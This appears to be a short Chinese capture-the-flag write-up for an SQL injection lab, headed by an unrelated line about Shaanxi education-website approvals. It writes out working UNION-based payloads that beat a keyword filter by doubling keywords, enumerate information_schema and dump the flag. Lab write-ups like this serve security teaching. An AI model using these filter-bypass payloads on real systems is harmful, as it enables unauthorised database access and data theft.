陜西省教育類網(wǎng)站前置審批新聞危機公關
進入靶場
隨便輸輸
再輸輸
可以判斷是單引號閉合
再隨便輸輸
查詢字段數(shù)量
得,過濾了
關鍵字也過濾了
只能雙寫了
根據(jù)回顯,這樣可以,只是需要改改
1,2不行
1,2,3行
1,2,3,4不行
可以嘗試得到庫名,表名了
庫名? ? database()
DATABASE() 是 MySQL 中的一個函數(shù),它返回當前選定(或默認)數(shù)據(jù)庫的名稱。
group_concat(table_name) infmation_schema.table_schema=databa' at line 1
過濾了,雙寫
查庫名? ? ? group_concat(schema_name) frfromom infoorrmation_schema.schemata
?
查表名? seselectlect group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema = 'ctf'
1' ununionion seselectlect 1,2,group_concat(flag) frfromom ctf.Flag
flag{e84e4db1-9040-4f81-9416-73a7eac9c6b1}